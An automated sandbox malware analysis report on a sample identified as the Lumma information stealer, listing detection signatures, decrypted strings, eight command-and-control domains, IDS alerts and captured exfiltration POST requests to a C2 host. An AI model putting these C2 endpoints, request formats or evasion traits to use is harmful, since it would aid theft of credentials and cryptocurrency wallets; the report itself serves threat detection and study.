Windows Analysis Report
file.exe

Overview

General Information

Sample name: file.exe
Analysis ID: 1546641
MD5: 6fdf2cdf68ab1880aa76e7938e241fa3
SHA1: affc9a0aea771ad101357cc728951f5938b5e4e6
SHA256: e61ce90df13402909985f5312fdef798736eb10e0b5b6b280fb826538e7a597a
Tags: exeuser-Bitsight
Infos:

Detection

LummaC
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Found malware configuration
Suricata IDS alerts for network traffic
Yara detected LummaC Stealer
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
LummaC encrypted strings found
Query firmware table information (likely to detect VMs)
Sample uses string decryption to hide its real strings
Sigma detected: Silenttrinity Stager Msbuild Activity
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Crypto Currency Wallets
Uses ping.exe to check the status of other devices and networks
Uses ping.exe to sleep
AV process strings found (often used to terminate AV products)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to block mouse and keyboard input (often used to hinder debugging)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Contains functionality to execute programs as a different user
Contains functionality to launch a process as a different user
Contains functionality to launch a program with higher privileges
Contains functionality to modify clipboard data
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to record screenshots
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality to simulate keystroke presses
Contains functionality to simulate mouse events
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Drops PE files
Enables debug privileges
Found dropped PE file which has not been started or loaded
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
OS version to string mapping found (often used in BOTs)
PE / OLE file has an invalid certificate
PE file contains an invalid checksum
PE file contains executable resources (Code or Archives)
PE file contains more sections than normal
PE file contains sections with non-standard names
PE file does not import any functions
Potential key logger detected (key state polling based)
Queries information about the installed CPU (vendor, model number etc)
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries the product ID of Windows
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Searches for user specific document files
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer
Yara detected Keylogger Generic

Classification

Name Description Attribution Blogpost URLs Link
Lumma Stealer, LummaC2 Stealer Lumma Stealer (aka LummaC2 Stealer) is an information stealer written in C language that has been available through a Malware-as-a-Service (MaaS) model on Russian-speaking forums since at least August 2022. It is believed to have been developed by the threat actor "Shamel", who goes by the alias "Lumma". Lumma Stealer primarily targets cryptocurrency wallets and two-factor authentication (2FA) browser extensions, before ultimately stealing sensitive information from the victim's machine. Once the targeted data is obtained, it is exfiltrated to a C2 server via HTTP POST requests using the user agent "TeslaBrowser/5.5"." The stealer also features a non-resident loader that is capable of delivering additional payloads via EXE, DLL, and PowerShell. No Attribution https://malpedia.caad.fkie.fraunhofer.de/details/win.lumma

AV Detection
barindex
Found malware configuration
Source: 36.2.MSBuild.exe.400000.0.unpack Malware Configuration Extractor: LummaC {"C2 url": ["goalyfeastz.site", "dilemmadu.site", "seallysl.site", "authorisev.site", "contemteny.site", "faulteyotk.site", "opposezmny.site", "servicedny.site"], "Build id": "MkfS5f--"}
AI detected suspicious sample
Source: Submited Sample Integrated Neural Analysis Model: Matched 95.8% probability
Sample uses string decryption to hide its real strings
Source: 00000023.00000002.2228311114.0000000003D3C000.00000004.00001000.00020000.00000000.sdmp String decryptor: servicedny.site
Source: 00000023.00000002.2228311114.0000000003D3C000.00000004.00001000.00020000.00000000.sdmp String decryptor: authorisev.site
Source: 00000023.00000002.2228311114.0000000003D3C000.00000004.00001000.00020000.00000000.sdmp String decryptor: faulteyotk.site
Source: 00000023.00000002.2228311114.0000000003D3C000.00000004.00001000.00020000.00000000.sdmp String decryptor: dilemmadu.site
Source: 00000023.00000002.2228311114.0000000003D3C000.00000004.00001000.00020000.00000000.sdmp String decryptor: contemteny.site
Source: 00000023.00000002.2228311114.0000000003D3C000.00000004.00001000.00020000.00000000.sdmp String decryptor: goalyfeastz.site
Source: 00000023.00000002.2228311114.0000000003D3C000.00000004.00001000.00020000.00000000.sdmp String decryptor: opposezmny.site
Source: 00000023.00000002.2228311114.0000000003D3C000.00000004.00001000.00020000.00000000.sdmp String decryptor: seallysl.site
Source: 00000023.00000002.2228311114.0000000003D3C000.00000004.00001000.00020000.00000000.sdmp String decryptor: authorisev.site
Source: 00000023.00000002.2228311114.0000000003D3C000.00000004.00001000.00020000.00000000.sdmp String decryptor: lid=%s&j=%s&ver=4.0
Source: 00000023.00000002.2228311114.0000000003D3C000.00000004.00001000.00020000.00000000.sdmp String decryptor: TeslaBrowser/5.5
Source: 00000023.00000002.2228311114.0000000003D3C000.00000004.00001000.00020000.00000000.sdmp String decryptor: - Screen Resoluton:
Source: 00000023.00000002.2228311114.0000000003D3C000.00000004.00001000.00020000.00000000.sdmp String decryptor: - Physical Installed Memory:
Source: 00000023.00000002.2228311114.0000000003D3C000.00000004.00001000.00020000.00000000.sdmp String decryptor: Workgroup: -
Source: 00000023.00000002.2228311114.0000000003D3C000.00000004.00001000.00020000.00000000.sdmp String decryptor: MkfS5f--
Uses Microsoft's Enhanced Cryptographic Provider
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 36_2_0041D5AF CryptUnprotectData, 36_2_0041D5AF
Uses 32bit PE files
Source: file.exe Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: unknown HTTPS traffic detected: 104.21.85.194:443 -> 192.168.2.4:49739 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.85.194:443 -> 192.168.2.4:49741 version: TLS 1.2
Source: unknown HTTPS traffic detected: 13.107.246.45:443 -> 192.168.2.4:49742 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.85.194:443 -> 192.168.2.4:49743 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.85.194:443 -> 192.168.2.4:49749 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.85.194:443 -> 192.168.2.4:49755 version: TLS 1.2
Source: unknown HTTPS traffic detected: 13.107.246.45:443 -> 192.168.2.4:49760 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.85.194:443 -> 192.168.2.4:49766 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.85.194:443 -> 192.168.2.4:49777 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.85.194:443 -> 192.168.2.4:49793 version: TLS 1.2
Source: file.exe Static PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
Source: Binary string: C:\dvs\p4\build\sw\devrel\Playpen\yyao\VRBench\VR-FCAT\FVSDK_rel_1_0\Symbols\FCAT_DT_Capture_x64.pdb source: file.exe, is-E0D1D.tmp.3.dr
Source: Binary string: wntdll.pdbUGP source: Updater.exe, 00000023.00000003.2224707416.0000000004201000.00000004.00001000.00020000.00000000.sdmp, Updater.exe, 00000023.00000002.2228529906.000000000427C000.00000004.00001000.00020000.00000000.sdmp, Updater.exe, 00000023.00000003.2226347479.00000000040E0000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: C:\dvs\p4\build\sw\devrel\Playpen\yyao\VRBench\VR-FCAT\FVSDK_rel_1_0\Symbols\FCAT_DT_Capture_x64.pdbz source: file.exe, is-E0D1D.tmp.3.dr
Source: Binary string: wntdll.pdb source: Updater.exe, 00000023.00000003.2224707416.0000000004201000.00000004.00001000.00020000.00000000.sdmp, Updater.exe, 00000023.00000002.2228529906.000000000427C000.00000004.00001000.00020000.00000000.sdmp, Updater.exe, 00000023.00000003.2226347479.00000000040E0000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: c:\zlib-dll\Release\isunzlib.pdb source: file.tmp, 00000001.00000003.1680291357.0000000003B70000.00000004.00001000.00020000.00000000.sdmp, file.tmp, 00000001.00000003.1682791691.0000000002B80000.00000004.00001000.00020000.00000000.sdmp, file.tmp, 00000003.00000003.1716658653.0000000002490000.00000004.00001000.00020000.00000000.sdmp, _isdecmp.dll.1.dr, _isdecmp.dll.3.dr
Source: C:\Users\user\AppData\Local\hangbird\Updater.exe Code function: 35_2_00B8E180 GetFileAttributesW,FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose, 35_2_00B8E180
Source: C:\Users\user\AppData\Local\hangbird\Updater.exe Code function: 35_2_00B9A187 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose, 35_2_00B9A187
Source: C:\Users\user\AppData\Local\hangbird\Updater.exe Code function: 35_2_00B9A2E4 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose, 35_2_00B9A2E4
Source: C:\Users\user\AppData\Local\hangbird\Updater.exe Code function: 35_2_00B9A66E FindFirstFileW,Sleep,FindNextFileW,FindClose, 35_2_00B9A66E
Source: C:\Users\user\AppData\Local\hangbird\Updater.exe Code function: 35_2_00B9686D FindFirstFileW,FindNextFileW,FindClose, 35_2_00B9686D
Source: C:\Users\user\AppData\Local\hangbird\Updater.exe Code function: 35_2_00B8E9BA GetFileAttributesW,FindFirstFileW,FindClose, 35_2_00B8E9BA
Source: C:\Users\user\AppData\Local\hangbird\Updater.exe Code function: 35_2_00B974F0 FindFirstFileW,FindClose, 35_2_00B974F0
Source: C:\Users\user\AppData\Local\hangbird\Updater.exe Code function: 35_2_00B97591 FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime, 35_2_00B97591
Source: C:\Users\user\AppData\Local\hangbird\Updater.exe Code function: 35_2_00B8DE32 GetFileAttributesW,GetFileAttributesW,GetFileAttributesW,FindFirstFileW,DeleteFileW,CompareStringW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose, 35_2_00B8DE32
Source: C:\Users\user\AppData\Local\hangbird\Updater.exe Code function: 35_2_013F50B5 FindFirstFileA,FindClose,FileTimeToLocalFileTime,FileTimeToDosDateTime, 35_2_013F50B5
Source: C:\Users\user\AppData\Local\hangbird\Updater.exe Code function: 35_2_013F51BD FindFirstFileA,GetLastError, 35_2_013F51BD
Source: C:\Users\user\AppData\Local\hangbird\Updater.exe Code function: 35_2_013F29E5 GetModuleHandleA,GetProcAddress,lstrcpyn,lstrcpyn,lstrcpyn,FindFirstFileA,FindClose,lstrlen,lstrcpyn,lstrlen,lstrcpyn, 35_2_013F29E5
Found inlined nop instructions (likely shell or obfuscated code)
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 4x nop then movzx edx, byte ptr [esp+ecx+5A603547h] 36_2_00410130
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 4x nop then mov byte ptr [ebx], dl 36_2_00410130
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 4x nop then movzx ecx, byte ptr [ecx+eax-24F86745h] 36_2_00410130
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 4x nop then mov edx, ecx 36_2_00410130
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 4x nop then mov edx, ecx 36_2_00410130
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 4x nop then movzx esi, byte ptr [eax] 36_2_004441F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 4x nop then mov edx, ecx 36_2_0044137E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 4x nop then mov edx, ecx 36_2_004413D5
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 4x nop then jmp eax 36_2_0041D5AF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 4x nop then mov edx, eax 36_2_0043A97E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 4x nop then cmp dword ptr [eax+ebx*8], 7CDE1E50h 36_2_0043A97E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 4x nop then cmp dword ptr [edi+esi*8], B62B8D10h 36_2_0043A97E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 4x nop then mov byte ptr [ebx], cl 36_2_0042EB60
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 4x nop then mov ecx, eax 36_2_0042EB60
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 4x nop then lea edx, dword ptr [eax-80h] 36_2_0042EB60
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 4x nop then movzx ebx, byte ptr [esi+ecx+0000009Ch] 36_2_0042EB60
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 4x nop then movzx ecx, byte ptr [esi+eax+068F7B6Bh] 36_2_0042EB60
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 4x nop then mov dword ptr [esi+04h], eax 36_2_0042EB60
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 4x nop then mov byte ptr [ebx], al 36_2_0042EB60
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 4x nop then mov dword ptr [eax+ebx], 30303030h 36_2_00401000
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 4x nop then mov dword ptr [eax+ebx], 20202020h 36_2_00401000
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 4x nop then cmp dword ptr [ebx+edi*8], B62B8D10h 36_2_0043B170
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 4x nop then movzx edx, byte ptr [esp+ecx+5A603547h] 36_2_00410118
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 4x nop then mov byte ptr [ebx], dl 36_2_00410118
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 4x nop then movzx ecx, byte ptr [ecx+eax-24F86745h] 36_2_00410118
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 4x nop then mov edx, ecx 36_2_00410118
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 4x nop then mov edx, ecx 36_2_00410118
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 4x nop then jmp edx 36_2_004431D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 4x nop then xor byte ptr [ecx+ebx], bl 36_2_004431D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 4x nop then movzx edx, byte ptr [esp+eax-7DC9E524h] 36_2_004241E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 4x nop then jmp edx 36_2_00442EB0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 4x nop then xor byte ptr [ecx+ebx], bl 36_2_00442EB0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 4x nop then jmp edx 36_2_004432C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 4x nop then xor byte ptr [ecx+ebx], bl 36_2_004432C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 4x nop then mov byte ptr [eax+ebx], 00000030h 36_2_004012D5
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 4x nop then mov ecx, ebx 36_2_00421333
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 4x nop then movzx esi, byte ptr [eax] 36_2_00444380
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 4x nop then jmp edx 36_2_004433B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 4x nop then xor byte ptr [ecx+ebx], bl 36_2_004433B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 4x nop then cmp byte ptr [esi+ebx], 00000000h 36_2_0042E400
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 4x nop then movzx ebx, byte ptr [esi+ecx+0000009Ch] 36_2_0042F4DD
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 4x nop then movzx ecx, byte ptr [esi+eax+068F7B6Bh] 36_2_0042F4DD
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 4x nop then mov dword ptr [esi+04h], eax 36_2_0042F4DD
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 4x nop then mov byte ptr [ebx], al 36_2_0042F4DD
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 4x nop then mov ebx, eax 36_2_0040D500
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 4x nop then mov word ptr [ebx], ax 36_2_0041F510
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 4x nop then mov byte ptr [esi], cl 36_2_0041F510
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 4x nop then movzx edx, byte ptr [esp+ecx-67BC38F0h] 36_2_00441648
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 4x nop then movzx eax, word ptr [esi+ecx] 36_2_0043C6D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 4x nop then mov word ptr [eax], cx 36_2_0041C6E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 4x nop then movzx ebx, byte ptr [esp+ecx+52B71DE2h] 36_2_00441720
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 4x nop then xor byte ptr [ecx+ebx], bl 36_2_00443720
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 4x nop then movzx eax, byte ptr [esp+ebx-09A22FB6h] 36_2_0043F7E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 4x nop then add ebp, dword ptr [esp+0Ch] 36_2_0042E870
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 4x nop then movzx ecx, byte ptr [edi+ebx] 36_2_00405820
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 4x nop then mov word ptr [eax], cx 36_2_0041C8CE
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 4x nop then mov ecx, eax 36_2_0040E8D6
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 4x nop then movzx ebx, byte ptr [edx+esi] 36_2_0040C960
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 4x nop then mov ecx, eax 36_2_0040E996
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 4x nop then jmp eax 36_2_0042AA40
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 4x nop then movzx ecx, byte ptr [esp+eax+1817620Ch] 36_2_0042AA60
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 4x nop then mov word ptr [eax], cx 36_2_0042CA72
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 4x nop then mov word ptr [eax], cx 36_2_0042CA72
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 4x nop then movzx ecx, byte ptr [esp+eax+2BB126CDh] 36_2_0043FAD0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 4x nop then mov edi, edx 36_2_00421B40
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 4x nop then cmp al, 2Eh 36_2_0042AC04
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 4x nop then mov edi, esi 36_2_0041ECDE
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 4x nop then movzx ebx, byte ptr [edx] 36_2_00437CA0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 4x nop then mov ebx, dword ptr [edi+04h] 36_2_0042DE70
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 4x nop then mov dword ptr [esp+3Ch], 595A5B84h 36_2_00440E3A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 4x nop then mov edi, dword ptr [esp+54h] 36_2_0042CEDA
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 4x nop then jmp edx 36_2_00442EB0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 4x nop then xor byte ptr [ecx+ebx], bl 36_2_00442EB0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 4x nop then cmp word ptr [ebp+edi+02h], 0000h 36_2_00425F00
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 4x nop then movzx edi, word ptr [edx] 36_2_00428F00

Networking
barindex
Suricata IDS alerts for network traffic
Source: Network traffic Suricata IDS: 2057071 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (authorisev .site) : 192.168.2.4:51868 -> 1.1.1.1:53
Source: Network traffic Suricata IDS: 2057072 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (authorisev .site in TLS SNI) : 192.168.2.4:49743 -> 104.21.85.194:443
Source: Network traffic Suricata IDS: 2057072 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (authorisev .site in TLS SNI) : 192.168.2.4:49755 -> 104.21.85.194:443
Source: Network traffic Suricata IDS: 2057072 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (authorisev .site in TLS SNI) : 192.168.2.4:49777 -> 104.21.85.194:443
Source: Network traffic Suricata IDS: 2057072 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (authorisev .site in TLS SNI) : 192.168.2.4:49749 -> 104.21.85.194:443
Source: Network traffic Suricata IDS: 2057072 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (authorisev .site in TLS SNI) : 192.168.2.4:49741 -> 104.21.85.194:443
Source: Network traffic Suricata IDS: 2057072 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (authorisev .site in TLS SNI) : 192.168.2.4:49766 -> 104.21.85.194:443
Source: Network traffic Suricata IDS: 2057072 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (authorisev .site in TLS SNI) : 192.168.2.4:49739 -> 104.21.85.194:443
Source: Network traffic Suricata IDS: 2057072 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (authorisev .site in TLS SNI) : 192.168.2.4:49793 -> 104.21.85.194:443
Source: Network traffic Suricata IDS: 2048094 - Severity 1 - ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration : 192.168.2.4:49766 -> 104.21.85.194:443
Source: Network traffic Suricata IDS: 2049812 - Severity 1 - ET MALWARE Lumma Stealer Related Activity M2 : 192.168.2.4:49741 -> 104.21.85.194:443
Source: Network traffic Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:49741 -> 104.21.85.194:443
Source: Network traffic Suricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.4:49739 -> 104.21.85.194:443
Source: Network traffic Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:49739 -> 104.21.85.194:443
Source: Network traffic Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:49793 -> 104.21.85.194:443
Source: Network traffic Suricata IDS: 2843864 - Severity 1 - ETPRO MALWARE Suspicious Zipped Filename in Outbound POST Request (screen.) M2 : 192.168.2.4:49777 -> 104.21.85.194:443
C2 URLs / IPs found in malware configuration
Source: Malware configuration extractor URLs: goalyfeastz.site
Source: Malware configuration extractor URLs: dilemmadu.site
Source: Malware configuration extractor URLs: seallysl.site
Source: Malware configuration extractor URLs: authorisev.site
Source: Malware configuration extractor URLs: contemteny.site
Source: Malware configuration extractor URLs: faulteyotk.site
Source: Malware configuration extractor URLs: opposezmny.site
Source: Malware configuration extractor URLs: servicedny.site
Uses ping.exe to check the status of other devices and networks
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\PING.EXE ping -n 5 127.0.0.1
Internet Provider seen in connection with other malware
Source: Joe Sandbox View ASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
JA3 SSL client fingerprint seen in connection with other malware
Source: Joe Sandbox View JA3 fingerprint: 28a2c9bd18a11de089ef85a160da29e4
Source: Joe Sandbox View JA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1
Suricata IDS alerts with low severity for network traffic
Source: Network traffic Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49743 -> 104.21.85.194:443
Source: Network traffic Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49755 -> 104.21.85.194:443
Source: Network traffic Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49777 -> 104.21.85.194:443
Source: Network traffic Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49766 -> 104.21.85.194:443
Source: Network traffic Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49749 -> 104.21.85.194:443
Source: Network traffic Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49741 -> 104.21.85.194:443
Source: Network traffic Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49739 -> 104.21.85.194:443
Source: Network traffic Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49793 -> 104.21.85.194:443
Uses a known web browser user agent for HTTP communication
Source: global traffic HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: authorisev.site
Source: global traffic HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedCookie: __cf_mw_byp=6dV0eNX_lBbnb2hOAl2v78FYI7Qpdk4E83U3y_mHFl4-1730454656-0.0.1.1-/apiUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 42Host: authorisev.site
Source: global traffic HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=be85de5ipdocierre1Cookie: __cf_mw_byp=6dV0eNX_lBbnb2hOAl2v78FYI7Qpdk4E83U3y_mHFl4-1730454656-0.0.1.1-/apiUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 18158Host: authorisev.site
